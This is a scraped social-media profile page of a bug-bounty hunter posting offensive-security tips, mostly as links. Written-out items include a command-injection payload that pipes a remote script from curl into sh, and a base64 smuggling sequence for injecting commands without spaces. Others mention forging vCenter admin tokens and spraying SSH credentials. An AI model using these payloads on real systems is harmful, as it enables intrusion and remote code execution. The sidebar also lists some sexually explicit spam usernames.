Olivia
Online
huntmost
@huntmost
happy huntin'
Joined September 2019
0 Following
555 Followers
118 Posts
forge yourself an admin token if you happen across a vcsa backup - https://t.co/DQgISgDMlR
Reverse name server lookup to see other domains using a DNS server: https://t.co/n3IB3xvtsv
😈
logger++ -> elastic FTW
https://t.co/LDk8TO4jk2
https://t.co/gR2NoO7Do3
Who to follow
HAHWUL 
@hahwul
🔥 Offensive Security Engineer, Developer and H4cker. Feel free to call me HAH-hul or HOWL—whichever you prefer!
Tanner
@itscachemoney
Somewhere between a builder and a breaker | @hacknotcrime
gujjuboy10x00
@vis_hacker
Vishal Panchani Security Engineer | Hall of Fame: Google, PayPal, Apple, 500+| Top 10 All-Time on HackerOne | Hack the planet
mutatators ftw
https://t.co/MEb7aexQFy
https://t.co/SzRTMPxXtq
https://t.co/OCuLiwJOa4
https://t.co/mlX0WLzy4C
not specifically for dns, but extremely useful:
https://t.co/gNZuxysRcs
#bugbountytip
https://t.co/H7WsLH42LB
golang (fast) ssl scraper , use as input to recon domains
#bugbountytips
many a way to RCE Apache Solr nicely detailed here: https://t.co/Qa7rGV5uFU
#bugbountytips
bomb: https://t.co/K30nzD7mpw
ssh spray, exec commands, pillage , test sudo & more
😈
https://t.co/rhCtZvi1SR
g o l d
man.. year ago discovered arb upload in a vendor app, reported it, tested the fix and marked it resolved. bumped into it again about a month ago, found a bypass, got a shell. went back to the first one tonight, bypass works there too.
Not a bad day
got lucky today:
Found /someendpoint.cgi that takes user input
Manipulation of input results in a promising, potential RCE
But useful chars are cleaned :(
Fuzz /someendpoint_FUZZ.cgi and find backup file
Backup file doesn't clean input as well!
||curl x.x.x.x|sh;
🐚😁
https://t.co/R1F1XrW10g solid static binary for trying all those creds in the dmz
command injection with no spaces and no outbound?
1. base64 a complex command locally
2. {shuf,-e,"$b64",-o,$file}
3. {openssl,base64,-d,-in,$file,-out,$script}
4. {bash,$script}
https://t.co/e8tY5p3LAo
#BugBounty
3 telerik apps in a row that I can't exploit CVE-2019-18935. 2 I get 0 indication its working and 1 I can throw the smb flag and get my domain looked up but no code exec.
'KeyHacks shows ways in which particular API keys found on a Bug Bounty Program can be used, to check if they are valid.'
https://t.co/a25A5FwBbu
#bugbountytips #BugBounty
https://t.co/5c33xADlhB
https://t.co/rwlWeBQUNO
https://t.co/EGnOfzzKL9
https://t.co/8yFYe7cDOS
these zines are essential: https://t.co/m500lKjEzv
Last Seen Users on Sotwe
Nice Videos 💚
Seen from Turkey
Hospitality Action
انوــسي 🇮🇶🎀💞
Seen from Italy
abahdut
Seen from Singapore
Umut silah
Seen from Turkey
ihanet evli bekar ve dul bayanlar herşey gizli olm
Seen from Turkey
Botun โบตั๋นค่ะ ทวิตใหม่ ชอบแตกปากค่ะ
Seen from Thailand
เจค้าบ กางเกงในผมเองคับ...ชอบเย็ดสาวใหญ่ค้าบ
Seen from Thailand
الغـريـب 🔱 🎬🔥
hallo
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.3M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers